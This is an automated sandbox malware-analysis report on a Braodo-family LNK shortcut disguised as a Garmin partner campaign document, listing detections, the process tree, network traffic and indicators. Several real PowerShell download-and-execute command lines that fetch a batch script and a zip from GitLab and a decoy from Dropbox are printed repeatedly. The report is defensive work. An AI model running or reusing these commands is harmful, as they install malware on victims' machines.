Edit tour

Windows Analysis Report
3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk

Overview

General Information

Sample name:	3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk
Analysis ID:	1573660
MD5:	226e454fb58db50a6ebcd890911ce3c1
SHA1:	5dc76d585b68596f22056345620f9d008b37adb1
SHA256:	e994c8193888e0d28828d08e2aacb40c05c7b43e9f572ec79b64cf56f7e6ac05
Tags:	braodolnkstare2user-JAMESWT_MHT
Infos:

Detection

Abobus Obfuscator, Braodo

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Yara detected Abobus Obfuscator

Yara detected Braodo

Yara detected Powershell download and execute

AI detected suspicious sample

Machine Learning detection for sample

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: PowerShell DownloadFile

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Suspicious powershell command line found

Tries to download and execute files (via powershell)

Uses an obfuscated file name to hide its real file extension (double extension)

Windows shortcut file (LNK) contains suspicious command line arguments

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 1804 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6860 cmdline: powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 4176 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Updates.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3968 cmdline: chcp.com 437 MD5: 33395C4732A49065EA72590B14B64F32)

find.exe (PID: 5424 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

findstr.exe (PID: 2012 cmdline: findstr /L /I set "C:\Users\user\AppData\Local\Temp\Updates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

findstr.exe (PID: 2836 cmdline: findstr /L /I goto "C:\Users\user\AppData\Local\Temp\Updates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

findstr.exe (PID: 6108 cmdline: findstr /L /I echo "C:\Users\user\AppData\Local\Temp\Updates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

findstr.exe (PID: 5552 cmdline: findstr /L /I pause "C:\Users\user\AppData\Local\Temp\Updates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

find.exe (PID: 6040 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 5844 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 1824 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 6456 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7124 cmdline: powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx'" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 6520 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Updates.bat	JoeSecurity_AbobusObfuscator	Yara detected Abobus Obfuscator	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000004.00000003.2169984727.000001E801303000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AbobusObfuscator	Yara detected Abobus Obfuscator	Joe Security
Process Memory Space: cmd.exe PID: 4176	JoeSecurity_Braodo_1	Yara detected Braodo	Joe Security
Process Memory Space: cmd.exe PID: 4176	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: cmd.exe PID: 4176	JoeSecurity_AbobusObfuscator	Yara detected Abobus Obfuscator	Joe Security
Process Memory Space: powershell.exe PID: 6456	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 6520	JoeSecurity_Braodo_1	Yara detected Braodo	Joe Security
Process Memory Space: powershell.exe PID: 6520	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Click to see the 2 entries

Other

Source	Rule	Description	Author
amsi64_6456.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_6520.amsi.csv	JoeSecurity_Braodo_1	Yara detected Braodo	Joe Security
amsi64_6520.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p", ProcessId: 1804, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Updates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4176, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", ProcessId: 6456, ProcessName: powershell.exe

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6860, TargetFilename: C:\Users\user\AppData\Local\Temp\Updates.bat

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Updates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4176, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", ProcessId: 6456, ProcessName: powershell.exe

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6520, TargetFilename: C:\Users\Public\Document.zip

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6860, TargetFilename: C:\Users\user\AppData\Local\Temp\Updates.bat

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Updates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4176, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", ProcessId: 6456, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p", ProcessId: 1804, ProcessName: cmd.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p", ProcessId: 1804, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p", CommandLine: powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1804, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p", ProcessId: 6860, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk

ReversingLabs: Detection: 20%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.7% probability

Machine Learning detection for sample

Source: 3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49726 version: TLS 1.2

Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 0000000F.00000002.2243104134.00000210F3F66000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: powershell.exe, 0000000F.00000002.2243795126.00000210F418C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000F.00000002.2243795126.00000210F418C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Yn.pdb source: powershell.exe, 0000000F.00000002.2243795126.00000210F418C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2243424451.00000210F3FCB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2243795126.00000210F4176000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ion.pdb source: powershell.exe, 0000000F.00000002.2243795126.00000210F4176000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: powershell.exe, 0000000F.00000002.2243795126.00000210F418C000.00000004.00000020.00020000.00000000.sdmp

Source: global traffic	HTTP traffic detected: GET /scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /stare2/garmin/-/raw/main/fuknew1112.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 172.65.251.78 172.65.251.78
Source: Joe Sandbox View	IP Address: 162.125.65.18 162.125.65.18

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic

HTTP traffic detected: GET /stare2/garmin/-/raw/main/garsukhjdf11.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gitlab.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /stare2/garmin/-/raw/main/garsukhjdf11.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gitlab.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /stare2/garmin/-/raw/main/fuknew1112.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive

Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Policy: default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; font-src https:// data: ; base-uri 'self' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; media-src https://* blob: ; frame-ancestors 'self' https://.dropbox.com ; frame-src https:// carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; font-src https:// data: ; base-uri 'self' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; media-src https://* blob: ; frame-ancestors 'self' https://.dropbox.com ; frame-src https:// carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; font-src https:// data: ; base-uri 'self' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; media-src https://* blob: ; frame-ancestors 'self' https://.dropbox.com ; frame-src https:// carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ 